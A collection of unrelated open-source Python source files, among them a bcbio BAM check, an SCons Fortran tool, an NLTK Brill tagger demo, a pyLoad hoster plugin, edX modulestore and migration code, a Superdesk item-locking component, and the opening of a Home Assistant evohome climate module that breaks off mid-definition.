    with closing(pysam.Samfile(align_bam, "rb")) as cur_bam:
        if region is not None:
            for region in regions:
                if isinstance(region, basestring):
                    # Whole-chromosome check: any read at all counts.
                    for item in cur_bam.fetch(str(region)):
                        return True
                else:
                    for item in cur_bam.fetch(str(region[0]), int(region[1]), int(region[2])):
                        return True
        else:
            # No region: scan until the first mapped read.
            for item in cur_bam:
                if not item.is_unmapped:
                    return True
    return False
| Cyberbio-Lab/bcbio-nextgen | bcbio/variation/realign.py | Python | mit | 4,077 |
"""SCons.Tool.sunf95
Tool-specific initialization for sunf95, the Sun Studio F95 compiler.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/sunf95.py 4720 2010/03/24 03:14:11 jars"
import SCons.Util
from FortranCommon import add_all_to_env
compilers = ['sunf95', 'f95']
def generate(env):
    """Add Builders and construction variables for sunf95 to an
    Environment."""
    add_all_to_env(env)
    compiler = env.Detect(compilers) or 'f95'
    # The generic FORTRAN tool and the F95-specific tool share one binary.
    for var in ('FORTRAN', 'F95'):
        env[var] = compiler
    # Shared-object builds reuse the static compiler plus -KPIC.
    env['SHFORTRAN'] = '$FORTRAN'
    env['SHF95'] = '$F95'
    env['SHFORTRANFLAGS'] = SCons.Util.CLVar('$FORTRANFLAGS -KPIC')
    env['SHF95FLAGS'] = SCons.Util.CLVar('$F95FLAGS -KPIC')
def exists(env):
    """Return a true value if one of the Sun f95 compilers can be found."""
    return env.Detect(compilers)
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
| qewerty/moto.old | tools/scons/engine/SCons/Tool/sunf95.py | Python | gpl-2.0 | 2,167 |
# -*- coding: utf-8 -*-
# Natural Language Toolkit: Transformation-based learning
#
# Copyright (C) 2001-2015 NLTK Project
# Author: Marcus Uneson <marcus.uneson@gmail.com>
# based on previous (nltk2) version by
# Christopher Maloof, Edward Loper, Steven Bird
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
from __future__ import print_function, absolute_import, division
import os
import pickle
import random
import time
from nltk.corpus import treebank
from nltk.tbl import error_list, Template
from nltk.tag.brill import Word, Pos
from nltk.tag import BrillTaggerTrainer, RegexpTagger, UnigramTagger
def demo():
    """
    Run a demo with defaults. See source comments for details,
    or docstrings of any of the more specific demo_* functions.
    Trains a Brill tagger via postag() with all-default settings.
    """
    postag()
def demo_repr_rule_format():
    """
    Exemplify repr(Rule) (see also str(Rule) and Rule.format("verbose"))
    """
    postag(ruleformat="repr")
def demo_str_rule_format():
    """
    Exemplify str(Rule) (see also repr(Rule) and Rule.format("verbose"))
    """
    postag(ruleformat="str")
def demo_verbose_rule_format():
    """
    Exemplify Rule.format("verbose")
    """
    postag(ruleformat="verbose")
def demo_multiposition_feature():
    """
    The feature/s of a template takes a list of positions
    relative to the current word where the feature should be
    looked for, conceptually joined by logical OR. For instance,
    Pos([-1, 1]), given a value V, will hold whenever V is found
    one step to the left and/or one step to the right.
    For contiguous ranges, a 2-arg form giving inclusive end
    points can also be used: Pos(-3, -1) is the same as the arg
    below.
    """
    postag(templates=[Template(Pos([-3,-2,-1]))])
def demo_multifeature_template():
    """
    Templates can have more than a single feature.
    Here: the current word combined with the two preceding tags.
    """
    postag(templates=[Template(Word([0]), Pos([-2,-1]))])
def demo_template_statistics():
    """
    Show aggregate statistics per template. Little used templates are
    candidates for deletion, much used templates may possibly be refined.
    Deleting unused templates is mostly about saving time and/or space:
    training is basically O(T) in the number of templates T
    (also in terms of memory usage, which often will be the limiting factor).
    """
    postag(incremental_stats=True, template_stats=True)
def demo_generated_templates():
    """
    Template.expand and Feature.expand are class methods facilitating
    generating large amounts of templates. See their documentation for
    details.
    Note: training with 500 templates can easily fill all available
    memory, even on relatively small corpora
    """
    wordtpls = Word.expand([-1,0,1], [1,2], excludezero=False)
    tagtpls = Pos.expand([-2,-1,0,1], [1,2], excludezero=True)
    templates = list(Template.expand([wordtpls, tagtpls], combinations=(1,3)))
    print("Generated {0} templates for transformation-based learning".format(len(templates)))
    postag(templates=templates, incremental_stats=True, template_stats=True)
def demo_learning_curve():
    """
    Plot a learning curve -- the contribution on tagging accuracy of
    the individual rules.
    Note: requires matplotlib
    """
    postag(incremental_stats=True, separate_baseline_data=True, learning_curve_output="learningcurve.png")
def demo_error_analysis():
    """
    Writes a file with context for each erroneous word after tagging testing data
    """
    postag(error_output="errors.txt")
def demo_serialize_tagger():
    """
    Serializes the learned tagger to a file in pickle format; reloads it
    and validates the process.
    """
    postag(serialize_output="tagger.pcl")
def demo_high_accuracy_rules():
    """
    Discard rules with low accuracy. This may hurt performance a bit,
    but will often produce rules which are more interesting read to a human.
    """
    postag(num_sents=3000, min_acc=0.96, min_score=10)
def postag(
    templates=None,
    tagged_data=None,
    num_sents=1000,
    max_rules=300,
    min_score=3,
    min_acc=None,
    train=0.8,
    trace=3,
    randomize=False,
    ruleformat="str",
    incremental_stats=False,
    template_stats=False,
    error_output=None,
    serialize_output=None,
    learning_curve_output=None,
    learning_curve_take=300,
    baseline_backoff_tagger=None,
    separate_baseline_data=False,
    cache_baseline_tagger=None):
    """
    Brill Tagger Demonstration
    :param templates: templates to be used in training; defaults to brill24()
    :type templates: list of Template
    :param tagged_data: corpus of tagged sentences; if None, the treebank corpus is used
    :type tagged_data: list(list(tuple(str, str)))
    :param num_sents: how many sentences of training and testing data to use
    :type num_sents: C{int}
    :param max_rules: maximum number of rule instances to create
    :type max_rules: C{int}
    :param min_score: the minimum score for a rule in order for it to be considered
    :type min_score: C{int}
    :param min_acc: the minimum accuracy for a rule in order for it to be considered
    :type min_acc: C{float}
    :param train: the fraction of the corpus to be used for training (1=all)
    :type train: C{float}
    :param trace: the level of diagnostic tracing output to produce (0-4)
    :type trace: C{int}
    :param randomize: whether the training data should be a random subset of the corpus
    :type randomize: C{bool}
    :param ruleformat: rule output format, one of "str", "repr", "verbose"
    :type ruleformat: C{str}
    :param incremental_stats: if true, will tag incrementally and collect stats for each rule (rather slow)
    :type incremental_stats: C{bool}
    :param template_stats: if true, will print per-template statistics collected in training and (optionally) testing
    :type template_stats: C{bool}
    :param error_output: the file where errors will be saved
    :type error_output: C{string}
    :param serialize_output: the file where the learned tbl tagger will be saved
    :type serialize_output: C{string}
    :param learning_curve_output: filename of plot of learning curve(s) (train and also test, if available)
    :type learning_curve_output: C{string}
    :param learning_curve_take: how many rules plotted
    :type learning_curve_take: C{int}
    :param baseline_backoff_tagger: the backoff tagger used by the unigram baseline (defaults to REGEXP_TAGGER)
    :type baseline_backoff_tagger: tagger
    :param separate_baseline_data: use a fraction of the training data exclusively for training baseline
    :type separate_baseline_data: C{bool}
    :param cache_baseline_tagger: cache baseline tagger to this file (only interesting as a temporary workaround to get
    deterministic output from the baseline unigram tagger between python versions)
    :type cache_baseline_tagger: C{string}
    Note on separate_baseline_data: if True, reuse training data both for baseline and rule learner. This
    is fast and fine for a demo, but is likely to generalize worse on unseen data.
    Also cannot be sensibly used for learning curves on training data (the baseline will be artificially high).
    """
    # defaults
    baseline_backoff_tagger = baseline_backoff_tagger or REGEXP_TAGGER
    if templates is None:
        from nltk.tag.brill import describe_template_sets, brill24
        # some pre-built template sets taken from typical systems or publications are
        # available. Print a list with describe_template_sets()
        # for instance:
        templates = brill24()
    (training_data, baseline_data, gold_data, testing_data) = \
       _demo_prepare_data(tagged_data, train, num_sents, randomize, separate_baseline_data)
    # creating (or reloading from cache) a baseline tagger (unigram tagger)
    # this is just a mechanism for getting deterministic output from the baseline between
    # python versions
    if cache_baseline_tagger:
        if not os.path.exists(cache_baseline_tagger):
            baseline_tagger = UnigramTagger(baseline_data, backoff=baseline_backoff_tagger)
            with open(cache_baseline_tagger, 'w') as print_rules:
                pickle.dump(baseline_tagger, print_rules)
            print("Trained baseline tagger, pickled it to {0}".format(cache_baseline_tagger))
        with open(cache_baseline_tagger, "r") as print_rules:
            baseline_tagger= pickle.load(print_rules)
            print("Reloaded pickled tagger from {0}".format(cache_baseline_tagger))
    else:
        baseline_tagger = UnigramTagger(baseline_data, backoff=baseline_backoff_tagger)
        print("Trained baseline tagger")
    if gold_data:
        print("    Accuracy on test set: {0:0.4f}".format(baseline_tagger.evaluate(gold_data)))
    # creating a Brill tagger
    tbrill = time.time()
    trainer = BrillTaggerTrainer(baseline_tagger, templates, trace, ruleformat=ruleformat)
    print("Training tbl tagger...")
    brill_tagger = trainer.train(training_data, max_rules, min_score, min_acc)
    print("Trained tbl tagger in {0:0.2f} seconds".format(time.time() - tbrill))
    if gold_data:
        print("    Accuracy on test set: %.4f" % brill_tagger.evaluate(gold_data))
    # printing the learned rules, if learned silently
    if trace == 1:
        print("\nLearned rules: ")
        for (ruleno, rule) in enumerate(brill_tagger.rules(),1):
            print("{0:4d} {1:s}".format(ruleno, rule.format(ruleformat)))
    # printing template statistics (optionally including comparison with the training data)
    # note: if not separate_baseline_data, then baseline accuracy will be artificially high
    if incremental_stats:
        print("Incrementally tagging the test data, collecting individual rule statistics")
        (taggedtest, teststats) = brill_tagger.batch_tag_incremental(testing_data, gold_data)
        print("    Rule statistics collected")
        if not separate_baseline_data:
            print("WARNING: train_stats asked for separate_baseline_data=True; the baseline "
                  "will be artificially high")
        trainstats = brill_tagger.train_stats()
        if template_stats:
            brill_tagger.print_template_statistics(teststats)
        if learning_curve_output:
            _demo_plot(learning_curve_output, teststats, trainstats, take=learning_curve_take)
            print("Wrote plot of learning curve to {0}".format(learning_curve_output))
    else:
        print("Tagging the test data")
        taggedtest = brill_tagger.tag_sents(testing_data)
        if template_stats:
            brill_tagger.print_template_statistics()
    # writing error analysis to file
    if error_output is not None:
        with open(error_output, 'w') as f:
            f.write('Errors for Brill Tagger %r\n\n' % serialize_output)
            f.write(u'\n'.join(error_list(gold_data, taggedtest)).encode('utf-8') + '\n')
        print("Wrote tagger errors including context to {0}".format(error_output))
    # serializing the tagger to a pickle file and reloading (just to see it works)
    if serialize_output is not None:
        taggedtest = brill_tagger.tag_sents(testing_data)
        with open(serialize_output, 'w') as print_rules:
            pickle.dump(brill_tagger, print_rules)
        print("Wrote pickled tagger to {0}".format(serialize_output))
        with open(serialize_output, "r") as print_rules:
            brill_tagger_reloaded = pickle.load(print_rules)
        print("Reloaded pickled tagger from {0}".format(serialize_output))
        # BUGFIX: previously called brill_tagger.tag_sents here, so the
        # reloaded tagger was never exercised and the comparison below
        # trivially succeeded.
        taggedtest_reloaded = brill_tagger_reloaded.tag_sents(testing_data)
        if taggedtest == taggedtest_reloaded:
            print("Reloaded tagger tried on test set, results identical")
        else:
            print("PROBLEM: Reloaded tagger gave different results on test set")
def _demo_prepare_data(tagged_data, train, num_sents, randomize, separate_baseline_data):
    """Split tagged sentences into (training, baseline, gold, testing) sets.

    Loads the treebank corpus when tagged_data is None.  The testing set is
    the gold set with tags stripped.
    """
    # train is the proportion of data used in training; the rest is reserved
    # for testing.
    if tagged_data is None:
        print("Loading tagged data from treebank... ")
        tagged_data = treebank.tagged_sents()
    if num_sents is None or len(tagged_data) <= num_sents:
        num_sents = len(tagged_data)
    if randomize:
        # Seed from the corpus size so shuffles are reproducible per corpus.
        random.seed(len(tagged_data))
        random.shuffle(tagged_data)
    cutoff = int(num_sents * train)
    training_data = tagged_data[:cutoff]
    gold_data = tagged_data[cutoff:num_sents]
    testing_data = [[t[0] for t in sent] for sent in gold_data]
    if not separate_baseline_data:
        baseline_data = training_data
    else:
        # Reserve the first third of the training data exclusively for the baseline.
        bl_cutoff = len(training_data) // 3
        (baseline_data, training_data) = (training_data[:bl_cutoff], training_data[bl_cutoff:])
    (trainseqs, traintokens) = corpus_size(training_data)
    (testseqs, testtokens) = corpus_size(testing_data)
    (bltrainseqs, bltraintokens) = corpus_size(baseline_data)
    print("Read testing data ({0:d} sents/{1:d} wds)".format(testseqs, testtokens))
    print("Read training data ({0:d} sents/{1:d} wds)".format(trainseqs, traintokens))
    print("Read baseline data ({0:d} sents/{1:d} wds) {2:s}".format(
        bltrainseqs, bltraintokens, "" if separate_baseline_data else "[reused the training set]"))
    return (training_data, baseline_data, gold_data, testing_data)
def _demo_plot(learning_curve_output, teststats, trainstats=None, take=None):
    """Plot cumulative tagging accuracy per applied rule; save to a file.

    Requires matplotlib.  *take* limits how many rules are plotted.
    """
    # Accuracy after rule k = 1 - (remaining errors / total tokens).
    testcurve = [teststats['initialerrors']]
    for rulescore in teststats['rulescores']:
        testcurve.append(testcurve[-1] - rulescore)
    testcurve = [1 - x/teststats['tokencount'] for x in testcurve[:take]]
    traincurve = [trainstats['initialerrors']]
    for rulescore in trainstats['rulescores']:
        traincurve.append(traincurve[-1] - rulescore)
    traincurve = [1 - x/trainstats['tokencount'] for x in traincurve[:take]]
    import matplotlib.pyplot as plt
    r = list(range(len(testcurve)))
    plt.plot(r, testcurve, r, traincurve)
    plt.axis([None, None, None, 1.0])
    plt.savefig(learning_curve_output)
# Two regexp-based baseline taggers used by the demos.
#
# NOTE: the decimal point in the cardinal-number pattern must be escaped
# ('\.'); the previous bare '.' matched ANY character, so tokens such as
# "1x5" were wrongly tagged CD.
NN_CD_TAGGER = RegexpTagger(
    [(r'^-?[0-9]+(\.[0-9]+)?$', 'CD'),  # cardinal numbers
     (r'.*', 'NN')])                    # everything else defaults to NN
REGEXP_TAGGER = RegexpTagger(
    [(r'^-?[0-9]+(\.[0-9]+)?$', 'CD'),  # cardinal numbers
     (r'(The|the|A|a|An|an)$', 'AT'),   # articles
     (r'.*able$', 'JJ'),                # adjectives
     (r'.*ness$', 'NN'),                # nouns formed from adjectives
     (r'.*ly$', 'RB'),                  # adverbs
     (r'.*s$', 'NNS'),                  # plural nouns
     (r'.*ing$', 'VBG'),                # gerunds
     (r'.*ed$', 'VBD'),                 # past tense verbs
     (r'.*', 'NN')                      # nouns (default)
     ])
def corpus_size(seqs):
    """Return (number of sequences, total number of tokens) for *seqs*."""
    token_total = 0
    for seq in seqs:
        token_total += len(seq)
    return (len(seqs), token_total)
if __name__ == '__main__':
    # Run the default demo when this module is executed as a script.
    demo_learning_curve()
| Reagankm/KnockKnock | venv/lib/python3.4/site-packages/nltk/tbl/demo.py | Python | gpl-2.0 | 14,715 |
# -*- coding: utf-8 -*
#
# Test links:
# https://www.androidfilehost.com/?fid=95916177934518197
import re
from module.plugins.internal.SimpleHoster import SimpleHoster
class AndroidfilehostCom(SimpleHoster):
    __name__ = "AndroidfilehostCom"
    __type__ = "hoster"
    __version__ = "0.05"
    __status__ = "testing"
    # Matches download links of the form https://androidfilehost.com/?fid=<digits>
    __pattern__ = r'https?://(?:www\.)?androidfilehost\.com/\?fid=\d+'
    __config__ = [("activated" , "bool", "Activated" , True),
                  ("use_premium" , "bool", "Use premium account if available" , True),
                  ("fallback" , "bool", "Fallback to free download if premium fails" , True),
                  ("chk_filesize", "bool", "Check file size" , True),
                  ("max_wait" , "int" , "Reconnect if waiting time is greater than minutes", 10 )]
    __description__ = """Androidfilehost.com hoster plugin"""
    __license__ = "GPLv3"
    __authors__ = [("zapp-brannigan", "fuerst.reinje@web.de")]
    # Regexes applied to the page HTML (presumably consumed by SimpleHoster's
    # info extraction — TODO confirm against the base class).
    NAME_PATTERN = r'<br />(?P<N>.*?)</h1>'
    SIZE_PATTERN = r'<h4>size</h4>\s*<p>(?P<S>[\d.,]+)(?P<U>[\w^_]+)</p>'
    HASHSUM_PATTERN = r'<h4>(?P<H>.*?)</h4>\s*<p><code>(?P<D>.*?)</code></p>'
    OFFLINE_PATTERN = r'404 not found'
    WAIT_PATTERN = r'users must wait <strong>(\d+) secs'
    def setup(self):
        # Allow simultaneous/resumed downloads; one chunk per file.
        self.multiDL = True
        self.resume_download = True
        self.chunk_limit = 1
    def handle_free(self, pyfile):
        # NOTE(review): re.search may return None when the wait notice is
        # absent; wait.group(1) would then raise AttributeError — confirm the
        # page always shows it.
        wait = re.search(self.WAIT_PATTERN, self.data)
        self.log_debug("Waiting time: %s seconds" % wait.group(1))
        fid = re.search(r'id="fid" value="(\d+)" />', self.data).group(1)
        self.log_debug("FID: %s" % fid)
        # Ask the mirror endpoint for download mirrors of this file id.
        html = self.load("https://www.androidfilehost.com/libs/otf/mirrors.otf.php",
                         post={'submit': 'submit',
                               'action': 'getdownloadmirrors',
                               'fid' : fid})
        # The JSON reply escapes '/' as '\/'; strip the backslashes.
        self.link = re.findall('"url":"(.*?)"', html)[0].replace("\\", "")
        mirror_host = self.link.split("/")[2]
        self.log_debug("Mirror Host: %s" % mirror_host)
        # Register the download with the stats endpoint (response unused).
        html = self.load("https://www.androidfilehost.com/libs/otf/stats.otf.php",
                         get={'fid' : fid,
                              'w' : 'download',
                              'mirror': mirror_host})
| Guidobelix/pyload | module/plugins/hoster/AndroidfilehostCom.py | Python | gpl-3.0 | 2,454 |
from itertools import repeat
from xmodule.course_module import CourseDescriptor
from .exceptions import (ItemNotFoundError, NoPathToItem)
from . import Location
def path_to_location(modulestore, course_id, location):
    '''
    Try to find a course_id/chapter/section[/position] path to location in
    modulestore. The courseware insists that the first level in the course is
    chapter, but any kind of module can be a "section".
    location: something that can be passed to Location
    course_id: Search for paths in this course.
    raise ItemNotFoundError if the location doesn't exist.
    raise NoPathToItem if the location exists, but isn't accessible via
    a chapter/section path in the course(s) being searched.
    Return a tuple (course_id, chapter, section, position) suitable for the
    courseware index view.
    A location may be accessible via many paths. This method may
    return any valid path.
    If the section is a sequential or vertical, position will be the position
    of this location in that sequence. Otherwise, position will
    be None. TODO (vshnayder): Not true yet.
    '''
    def flatten(xs):
        '''Convert lisp-style (a, (b, (c, ()))) list into a python list.
        Not a general flatten function. '''
        p = []
        while xs != ():
            p.append(xs[0])
            xs = xs[1]
        return p
    def find_path_to_course():
        '''Find a path up the location graph to a node with the
        specified category.
        If no path exists, return None.
        If a path exists, return it as a list with target location first, and
        the starting location last.
        '''
        # Standard DFS
        # To keep track of where we came from, the work queue has
        # tuples (location, path-so-far). To avoid lots of
        # copying, the path-so-far is stored as a lisp-style
        # list--nested hd::tl tuples, and flattened at the end.
        # NOTE: despite the name, `queue` is used as a stack (pop from the
        # end), which is what makes this depth-first.
        queue = [(location, ())]
        while len(queue) > 0:
            (loc, path) = queue.pop()  # Takes from the end
            loc = Location(loc)
            # get_parent_locations should raise ItemNotFoundError if location
            # isn't found so we don't have to do it explicitly. Call this
            # first to make sure the location is there (even if it's a course, and
            # we would otherwise immediately exit).
            parents = modulestore.get_parent_locations(loc, course_id)
            # print 'Processing loc={0}, path={1}'.format(loc, path)
            if loc.category == "course":
                # confirm that this is the right course
                if course_id == CourseDescriptor.location_to_id(loc):
                    # Found it!
                    path = (loc, path)
                    return flatten(path)
            # otherwise, add parent locations at the end
            newpath = (loc, path)
            queue.extend(zip(parents, repeat(newpath)))
        # If we're here, there is no path
        return None
    if not modulestore.has_item(location):
        raise ItemNotFoundError
    path = find_path_to_course()
    if path is None:
        raise NoPathToItem(location)
    n = len(path)
    course_id = CourseDescriptor.location_to_id(path[0])
    # pull out the location names: path[0] is the course itself, path[1] the
    # chapter, path[2] the section (when present).
    chapter = path[1].name if n > 1 else None
    section = path[2].name if n > 2 else None
    # Figure out the position
    position = None
    # This block of code will find the position of a module within a nested tree
    # of modules. If a problem is on tab 2 of a sequence that's on tab 3 of a
    # sequence, the resulting position is 3_2. However, no positional modules
    # (e.g. sequential and videosequence) currently deal with this form of
    # representing nested positions. This needs to happen before jumping to a
    # module nested in more than one positional module will work.
    if n > 3:
        position_list = []
        for path_index in range(2, n - 1):
            category = path[path_index].category
            if category == 'sequential' or category == 'videosequence':
                section_desc = modulestore.get_instance(course_id, path[path_index])
                child_locs = [c.location for c in section_desc.get_children()]
                # positions are 1-indexed, and should be strings to be consistent with
                # url parsing.
                position_list.append(str(child_locs.index(path[path_index + 1]) + 1))
        position = "_".join(position_list)
    return (course_id, chapter, section, position)
| abhinavp13/IITBX-edx-platform-dev | common/lib/xmodule/xmodule/modulestore/search.py | Python | agpl-3.0 | 4,563 |
# -*- coding: utf-8; -*-
#
# This file is part of Superdesk.
#
# Copyright 2013, 2014 Sourcefabric z.u. and contributors.
#
# For the full copyright and license information, please see the
# AUTHORS and LICENSE files distributed with this source code, or
# at https://www.sourcefabric.org/superdesk/license
from ..models.item import ItemModel
from eve.utils import config
from superdesk.errors import SuperdeskApiError
from superdesk.utc import utcnow
from superdesk.notification import push_notification
from apps.common.components.base_component import BaseComponent
from apps.common.models.utils import get_model
from superdesk.users.services import current_user_has_privilege
import superdesk
LOCK_USER = 'lock_user'
LOCK_SESSION = 'lock_session'
STATUS = '_status'
TASK = 'task'
class ItemLock(BaseComponent):
    """Component implementing per-user, per-session locking of content items."""
    def __init__(self, app):
        self.app = app
        # Release all locks held by a session when that session ends.
        self.app.on_session_end += self.on_session_end
    @classmethod
    def name(cls):
        """Return the component's registration name."""
        return 'item_lock'
    def lock(self, item_filter, user_id, session_id, etag):
        """Lock the item matching *item_filter* for *user_id*/*session_id*.

        Raises notFoundError when no item matches, forbiddenError when the
        item cannot be locked by this user.  Returns the re-read item.
        NOTE(review): *etag* is accepted but unused here.
        """
        item_model = get_model(ItemModel)
        item = item_model.find_one(item_filter)
        if not item:
            raise SuperdeskApiError.notFoundError()
        can_user_lock, error_message = self.can_lock(item, user_id, session_id)
        if can_user_lock:
            self.app.on_item_lock(item, user_id)
            updates = {LOCK_USER: user_id, LOCK_SESSION: session_id, 'lock_time': utcnow()}
            item_model.update(item_filter, updates)
            # Assign the locking user to the item's task.
            if item.get(TASK):
                item[TASK]['user'] = user_id
            else:
                item[TASK] = {'user': user_id}
            superdesk.get_resource_service('tasks').assign_user(item[config.ID_FIELD], item[TASK])
            self.app.on_item_locked(item, user_id)
            push_notification('item:lock', item=str(item.get(config.ID_FIELD)),
                              user=str(user_id), lock_time=updates['lock_time'],
                              lock_session=str(session_id))
        else:
            raise SuperdeskApiError.forbiddenError(message=error_message)
        item = item_model.find_one(item_filter)
        return item
    def unlock(self, item_filter, user_id, session_id, etag):
        """Unlock the item matching *item_filter*.

        Draft items with no saved version are deleted instead of unlocked
        (returns None in that case).  Raises notFoundError, badRequestError
        (not locked) or forbiddenError as appropriate.
        NOTE(review): *etag* is accepted but unused here.
        """
        item_model = get_model(ItemModel)
        item = item_model.find_one(item_filter)
        if not item:
            raise SuperdeskApiError.notFoundError()
        if not item.get(LOCK_USER):
            raise SuperdeskApiError.badRequestError(message="Item is not locked.")
        can_user_unlock, error_message = self.can_unlock(item, user_id)
        if can_user_unlock:
            self.app.on_item_unlock(item, user_id)
            # delete the item if nothing is saved so far
            # version 0 created on lock item
            if item.get(config.VERSION, 0) == 0 and item['state'] == 'draft':
                superdesk.get_resource_service('archive').delete(lookup={'_id': item['_id']})
                return
            updates = {LOCK_USER: None, LOCK_SESSION: None, 'lock_time': None, 'force_unlock': True}
            item_model.update(item_filter, updates)
            self.app.on_item_unlocked(item, user_id)
            push_notification('item:unlock', item=str(item_filter.get(config.ID_FIELD)), user=str(user_id),
                              lock_session=str(session_id))
        else:
            raise SuperdeskApiError.forbiddenError(message=error_message)
        item = item_model.find_one(item_filter)
        return item
    def unlock_session(self, user_id, session_id):
        """Unlock every item locked by the given session."""
        item_model = get_model(ItemModel)
        items = item_model.find({'lock_session': session_id})
        for item in items:
            self.unlock({'_id': item['_id']}, user_id, session_id, None)
    def can_lock(self, item, user_id, session_id):
        """
        Check whether *user_id*/*session_id* may lock *item*.
        Returns a (can_lock, error_message) tuple; error_message is '' on
        success.
        """
        can_user_edit, error_message = superdesk.get_resource_service('archive').can_edit(item, user_id)
        if can_user_edit:
            if item.get(LOCK_USER):
                # Same user in a different session, or a different user: deny.
                if str(item.get(LOCK_USER, '')) == str(user_id) and str(item.get(LOCK_SESSION)) != str(session_id):
                    return False, 'Item is locked by you in another session.'
                else:
                    if str(item.get(LOCK_USER, '')) != str(user_id):
                        return False, 'Item is locked by another user.'
        else:
            return False, error_message
        return True, ''
    def can_unlock(self, item, user_id):
        """
        Check whether *user_id* may unlock *item*.
        Returns a (can_unlock, error_message) tuple; the lock owner or a user
        with both 'archive' and 'unlock' privileges may unlock.
        """
        can_user_edit, error_message = superdesk.get_resource_service('archive').can_edit(item, user_id)
        if can_user_edit:
            if not (str(item.get(LOCK_USER, '')) == str(user_id) or
                    (current_user_has_privilege('archive') and current_user_has_privilege('unlock'))):
                return False, 'You don\'t have permissions to unlock an item.'
        else:
            return False, error_message
        return True, ''
    def on_session_end(self, user_id, session_id):
        """Session-end hook: release all locks held by the session."""
        self.unlock_session(user_id, session_id)
| amagdas/superdesk | server/apps/item_lock/components/item_lock.py | Python | agpl-3.0 | 5,241 |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the PersistentSubsectionGradeOverride table: override values for a
    # persisted subsection grade, linked one-to-one to
    # grades.PersistentSubsectionGrade via the 'grade' field.
    dependencies = [
        ('grades', '0012_computegradessetting'),
    ]
    operations = [
        migrations.CreateModel(
            name='PersistentSubsectionGradeOverride',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('created', models.DateTimeField(auto_now_add=True, db_index=True)),
                ('modified', models.DateTimeField(auto_now=True, db_index=True)),
                ('earned_all_override', models.FloatField(null=True, blank=True)),
                ('possible_all_override', models.FloatField(null=True, blank=True)),
                ('earned_graded_override', models.FloatField(null=True, blank=True)),
                ('possible_graded_override', models.FloatField(null=True, blank=True)),
                ('grade', models.OneToOneField(related_name='override', to='grades.PersistentSubsectionGrade',
                                               on_delete=models.CASCADE)),
            ],
        ),
    ]
| cpennington/edx-platform | lms/djangoapps/grades/migrations/0013_persistentsubsectiongradeoverride.py | Python | agpl-3.0 | 1,154 |
from UM.Scene.SceneNodeDecorator import SceneNodeDecorator
class GCodeListDecorator(SceneNodeDecorator):
    """Scene node decorator that carries a list of g-code data for the node."""
    def __init__(self):
        super().__init__()
        # The stored g-code; empty until setGCodeList() is called.
        self._gcode_list = []
    def getGCodeList(self):
        """Return the stored g-code list."""
        return self._gcode_list
    def setGCodeList(self, list):
        """Store *list* as this node's g-code list.

        NOTE(review): the parameter name shadows the builtin ``list``; kept
        as-is for keyword-argument compatibility with existing callers.
        """
        self._gcode_list = list
| alephobjects/Cura2 | cura/Scene/GCodeListDecorator.py | Python | lgpl-3.0 | 316 |
"""Support for Climate devices of (EMEA/EU-based) Honeywell evohome systems."""
from datetime import datetime, timedelta
import logging
import requests.exceptions
from homeassistant.components.climate import ClimateDevice
from homeassistant.components.climate.const import (
STATE_AUTO, STATE_ECO, STATE_MANUAL, SUPPORT_AWAY_MODE, SUPPORT_ON_OFF,
SUPPORT_OPERATION_MODE, SUPPORT_TARGET_TEMPERATURE)
from homeassistant.const import (
CONF_SCAN_INTERVAL, HTTP_SERVICE_UNAVAILABLE, HTTP_TOO_MANY_REQUESTS,
PRECISION_HALVES, STATE_OFF, TEMP_CELSIUS)
from homeassistant.core import callback
from homeassistant.helpers.dispatcher import (
async_dispatcher_connect, dispatcher_send)
from . import (
CONF_LOCATION_IDX, DATA_EVOHOME, DISPATCHER_EVOHOME, EVO_CHILD, EVO_PARENT,
GWS, TCS)
_LOGGER = logging.getLogger(__name__)
# The Controller's opmode/state and the zone's (inherited) state
EVO_RESET = 'AutoWithReset'
EVO_AUTO = 'Auto'
EVO_AUTOECO = 'AutoWithEco'
EVO_AWAY = 'Away'
EVO_DAYOFF = 'DayOff'
EVO_CUSTOM = 'Custom'
EVO_HEATOFF = 'HeatingOff'
# These are for Zones' opmode, and state
EVO_FOLLOW = 'FollowSchedule'
EVO_TEMPOVER = 'TemporaryOverride'
EVO_PERMOVER = 'PermanentOverride'
# For the Controller. NB: evohome treats Away mode as a mode in/of itself,
# where HA considers it to 'override' the existing operating mode
TCS_STATE_TO_HA = {
    EVO_RESET: STATE_AUTO,
    EVO_AUTO: STATE_AUTO,
    EVO_AUTOECO: STATE_ECO,
    EVO_AWAY: STATE_AUTO,
    EVO_DAYOFF: STATE_AUTO,
    EVO_CUSTOM: STATE_AUTO,
    EVO_HEATOFF: STATE_OFF
}
# Reverse mapping: the HA states a user can set on the Controller.
HA_STATE_TO_TCS = {
    STATE_AUTO: EVO_AUTO,
    STATE_ECO: EVO_AUTOECO,
    STATE_OFF: EVO_HEATOFF
}
TCS_OP_LIST = list(HA_STATE_TO_TCS)
# For the Zones: their opmode; their state is usually 'inherited' from the
# TCS.  (EVO_FOLLOW / EVO_TEMPOVER / EVO_PERMOVER are defined above — the
# redundant duplicate definitions that used to live here were removed.)
ZONE_STATE_TO_HA = {
